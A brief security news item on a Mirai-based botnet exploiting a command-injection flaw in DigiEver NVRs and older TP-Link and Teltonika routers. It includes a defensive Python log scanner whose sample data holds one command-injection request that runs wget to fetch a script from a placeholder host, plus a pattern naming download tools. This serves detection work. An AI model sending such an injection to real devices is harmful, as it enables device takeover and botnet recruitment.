A new Mirai-based botnet is actively targeting vulnerabilities in DigiEver DS-2105 Pro NVRs and outdated TP-Link routers, exploiting a previously untracked remote code execution flaw in the NVRs. Active since at least September, the campaign uses vulnerabilities including CVE-2023-1389 on TP-Link devices and CVE-2018-17532 on Teltonika RUT9XX routers.
The botnet exploits DigiEver NVRs through improper input validation in the /cgi-bin/cgi_main.cgi URI, allowing attackers to execute commands remotely. Once compromised, devices fetch malware from external servers and become part of the botnet, which conducts DDoS attacks or spreads further using exploit kits and stolen credentials.
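As an added defender-side example (not code from the Akamai report), the scanner below reads NVR web-access-log lines and flags requests to /cgi-bin/cgi_main.cgi whose query string carries shell metacharacters or download-tool names, the two traits a command-injection-then-fetch sequence leaves behind; the log lines, parameter names and addresses are constructed placeholders.

```python
import re
from dataclasses import dataclass, field
from urllib.parse import unquote

# Constructed sample access-log lines (Apache/nginx combined format).
# Parameter names and IP addresses are placeholders, not values from the report.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Dec/2024:10:01:02 +0000] "GET /cgi-bin/cgi_main.cgi?cgiName=status HTTP/1.1" 200 512
203.0.113.7 - - [12/Dec/2024:10:02:15 +0000] "GET /cgi-bin/cgi_main.cgi?param=;wget%20http://198.51.100.9/b.sh HTTP/1.1" 200 0
10.0.0.6 - - [12/Dec/2024:10:03:00 +0000] "GET /index.html?x=;id HTTP/1.1" 200 1024
"""

NVR_CGI = "/cgi-bin/cgi_main.cgi"
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Shell separators/substitution after URL decoding; '&' is left out because it
# is also the normal query-parameter separator and would cause false positives.
SHELL_META = re.compile(r'[;|`\n]|\$\(')
FETCH_TOOLS = re.compile(r'\b(wget|curl|tftp|ftpget|busybox)\b', re.IGNORECASE)


@dataclass
class Finding:
    src: str
    ts: str
    target: str
    reasons: list = field(default_factory=list)


def analyse(line: str):
    """Return a Finding for a suspicious cgi_main.cgi request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = unquote(m["target"])          # decode %xx so obfuscated payloads are visible
    path, _, query = target.partition("?")
    if path != NVR_CGI:                    # only the vulnerable CGI endpoint is in scope
        return None
    reasons = []
    if SHELL_META.search(query):
        reasons.append("shell metacharacter in query")
    if FETCH_TOOLS.search(query):
        reasons.append("download tool in query")
    return Finding(m["src"], m["ts"], target, reasons) if reasons else None


def scan(log_text: str) -> list:
    """Scan a whole log and return the list of findings."""
    return [f for f in (analyse(l) for l in log_text.splitlines()) if f]
```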
Notably, this Mirai variant employs advanced XOR and ChaCha20 encryption and targets various architectures, including x86, ARM, and MIPS. Akamai researchers highlight this as an evolution of Mirai tactics, surpassing older obfuscation methods.
Indicators of compromise (IoC) and Yara rules for detecting the malware are available in Akamai's detailed report, helping defenders mitigate this growing threat.